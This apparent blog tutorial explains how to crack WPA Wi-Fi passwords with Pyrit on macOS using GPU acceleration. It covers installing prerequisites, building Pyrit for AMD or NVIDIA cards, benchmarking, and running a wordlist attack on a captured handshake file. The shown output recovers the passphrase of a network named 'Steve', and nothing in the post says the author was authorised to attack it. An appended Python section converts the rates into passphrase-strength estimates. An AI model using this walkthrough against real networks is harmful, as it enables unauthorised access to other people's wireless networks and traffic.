Cracking a WPA password with aircrack-ng is not fast, especially in a VM. So the first thing is to do the cracking outside of BackTrack. We have to get the .cap file out of the VM: just drag it from the VM to the desktop.
Using just the CPU is also slow. GPUs these days can crack faster than the CPU.
Xcode Command Line Tools only
OS X Mountain Lion comes with OpenCL tools. Xcode is big, and most of it is iOS and OS X dev tools which we don't need, so you can install just the Command Line Tools. You have to have an Apple developer account to download them (it's free):
Then:
Click Next or Continue or whatever until it is done.
or Xcode (full version)
The full Xcode can be installed from the App Store:
Then the Command Line Tools have to be installed. Go to Xcode, then Properties:
Install Pyrit (AMD Radeon)
Pyrit is a Python tool that cracks WPA passwords.
Prerequisites. Download these into a folder, named PYRIT for example:
http://libdnet.googlecode.com/files/libdnet-1.12.tgz
http://dfn.dl.sourceforge.net/sourceforge/pylibpcap/pylibpcap-0.6.4.tar.gz
http://www.secdev.org/projects/scapy/files/scapy-latest.tar.gz
Then, in that folder, run in a terminal:
    tar -xzf libdnet-1.12.tgz
    cd libdnet-1.12
    ./configure
    make
    sudo make install
    cd python
    sudo python setup.py install
    cd ../..
    tar -xzf pylibpcap-0.6.4.tar.gz
    cd pylibpcap-0.6.4
    sudo python setup.py install
    cd ..
    tar -xzf scapy-latest.tar.gz
    cd scapy-2.1.0
    sudo python setup.py install
    cd ..
Now, it's time for the pyrit tool:
    svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit-read-only
    cd pyrit-read-only
    cd pyrit
    sudo python setup.py install
Install Pyrit (NVIDIA)
Extra steps for NVIDIA:
Download the NVIDIA driver from http://developer.nvidia.com/cuda/cuda-downloads.
If you don't have the NVIDIA driver, you'll get: SystemError: Nvidia's CUDA-compiler 'nvcc' can't be found.
Check the first and second option:
Then:
    cd ..
    cd ..
    cd pyrit-read-only
    cd cpyrit_cuda
    sudo LDFLAGS=-L/usr/local/cuda/lib python setup.py install
Test Pyrit
On a MacBook with ATI we get something like:
    $ pyrit list_cores
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    The following cores seem available...
    #1: 'OpenCL-Device 'ATI Radeon HD 6750M''
    #2: 'CPU-Core (SSE2/AES)'
    #3: 'CPU-Core (SSE2/AES)'
    #4: 'CPU-Core (SSE2/AES)'
    #5: 'CPU-Core (SSE2/AES)'
    #6: 'CPU-Core (SSE2/AES)'
    #7: 'CPU-Core (SSE2/AES)'
    #8: 'CPU-Core (SSE2/AES)'
On a MacBook with NVIDIA, we get something like:
    $ pyrit list_cores
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    The following cores seem available...
    #1: 'CUDA-Device #1 'GeForce 9400M''
    #2: 'CPU-Core (SSE2)'
Note: I have no idea why, when OpenCL or CUDA is installed, it takes the place of one of the cores; on a quad-core we get 7 cores with OpenCL. When benchmarking it seems all cores are being utilized. I guess it's a bug.
Benchmarking
    $ pyrit benchmark
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    Running benchmark (7724.0 PMKs/s)... -
    Computed 7723.98 PMKs/s total.
    #1: 'OpenCL-Device 'ATI Radeon HD 6750M'': 7180.7 PMKs/s (RTT 2.7)
    #2: 'CPU-Core (SSE2/AES)': 252.6 PMKs/s (RTT 3.8)
    #3: 'CPU-Core (SSE2/AES)': 247.2 PMKs/s (RTT 3.9)
    #4: 'CPU-Core (SSE2/AES)': 243.6 PMKs/s (RTT 4.0)
    #5: 'CPU-Core (SSE2/AES)': 246.6 PMKs/s (RTT 3.9)
    #6: 'CPU-Core (SSE2/AES)': 250.8 PMKs/s (RTT 3.8)
    #7: 'CPU-Core (SSE2/AES)': 253.0 PMKs/s (RTT 3.8)
    #8: 'CPU-Core (SSE2/AES)': 250.4 PMKs/s (RTT 3.9)
You can see that the GPU is faster than 7 cores (they should be 8, I don't know why one is missing).
Wordlists
Wordlists can be found here: http://blog.g0tmi1k.com/2011/06/dictionaries-wordlists.html
gfxCardStatus
Make sure you're in Discrete Only mode.
Otherwise pyrit will complain:
    Exception in thread OpenCL-Device 'ATI Radeon HD 6750M':
    [...]
    SystemError: Failed to create command-queue (CL_INVALID_VALUE)
    [...]
    SystemError: The core 'OpenCL-Device 'ATI Radeon HD 6750M'' has died unexpectedly
Cracking with Pyrit
    $ pyrit -r ~/Steve-01.cap --all-handshakes -i ~/WORDLISTS/4.9gb/BIG-WPA-LIST-1.txt attack_passthrough
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    Parsing file '/Users/c00l/Desktop/Steve-01.cap' (1/1)...
    Parsed 3539 packets (3539 802.11-packets), got 115 AP(s)
    Picked AccessPoint 00:0f:01:37:1a:a0 ('Steve') automatically.
    Attacking 20 handshake(s).
    Tried 140007 PMKs so far; 7550 PMKs per second.
    The password is 'forzajuve'.
--all-handshakes means that all handshakes in the file will be used together.
It will utilize the CPU and the GPU simultaneously. And now we get around 10k attempts/sec, which is a lot better than aircrack-ng in a VM.
Note: your computer will be unresponsive, so make sure anything CPU or GPU intensive is switched off.
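What the PMKs/s figures above measure, and what they mean for choosing a passphrase, as an added example (not code from the original post or from Pyrit). The function names are hypothetical, the rates are the ones printed in the output above, and the "password"/"IEEE" pair is the published IEEE 802.11i test vector.

```python
import hashlib

# Figures quoted from the page's own Pyrit output (PMKs per second).
BENCHMARK_RATE = 7723.98      # `pyrit benchmark` total
ATTACK_RATE = 7550            # rate reported during attack_passthrough
ATTACK_GUESSES = 140007       # PMKs tried before the passphrase was found
SECONDS_PER_YEAR = 365 * 24 * 3600


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """One 'PMK': PBKDF2-HMAC-SHA1 over the passphrase, salted with the
    SSID, 4096 iterations, 32-byte output (the WPA/WPA2-PSK derivation)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrases are 8 to 63 characters long")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def years_to_exhaust(alphabet: int, length: int, rate: float = BENCHMARK_RATE) -> float:
    """Worst-case years to try every passphrase of exactly `length`
    characters drawn from `alphabet` symbols at `rate` PMKs/s."""
    return alphabet ** length / rate / SECONDS_PER_YEAR


def min_random_length(alphabet: int, target_years: float, rate: float = BENCHMARK_RATE) -> int:
    """Shortest random passphrase (WPA minimum is 8) whose full keyspace
    takes at least `target_years` to exhaust at `rate` PMKs/s."""
    length = 8
    while years_to_exhaust(alphabet, length, rate) < target_years:
        length += 1
    return length


if __name__ == "__main__":
    # Salted by SSID: the same passphrase gives a different PMK per network name.
    print(wpa_pmk("password", "IEEE").hex())
    print("wordlist hit on the page: %.1f s" % (ATTACK_GUESSES / ATTACK_RATE))
    print("8 digits:        %.1f hours" % (years_to_exhaust(10, 8) * 365 * 24))
    print("8 lowercase:     %.2f years" % years_to_exhaust(26, 8))
    print("lowercase, >=1000 years:", min_random_length(26, 1000), "chars")
```

The keyspace figures only hold for randomly chosen passphrases: a word that appears in a wordlist is bounded by the list's size, which is why the one above fell after about 140,000 guesses.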
Some stuff was taken from here.